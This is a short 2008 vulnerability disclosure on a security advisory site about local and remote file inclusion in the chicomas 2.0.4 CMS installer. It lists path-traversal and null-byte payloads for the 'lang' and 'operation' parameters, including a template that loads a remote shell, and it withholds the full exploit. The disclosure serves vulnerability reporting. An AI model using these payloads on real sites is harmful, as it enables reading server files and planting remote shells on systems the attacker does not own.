Computer Security

Security Advisory: bug report
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Minibb 2.2a XSS Vulnerability

  [SECURITY] [DSA 1560-1] New kronolith2 packages fix cross site scripting

From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:28.04.2008
Subject:bug report



# Author:       Hadi Kiamarsi
# Exploit By :  Hadi Kiamarsi
# Email : hadikiamarsi@hotmail.com


# CMS:          chicomas.2.0.4
# Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip

web site : http://ircrash.com



##############################################################################
                            File Inclusion ( Local & Remote )

# Bugs :

#Local File Inclusion:

[chicomas]/install/?lang=../FILE%00
[chikomas]/install/?operation=../FILE%00

#Remote File Inclusion

[chicomas]/install/?lang=[SHELL]%00



#Exploit

exploit is very private
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru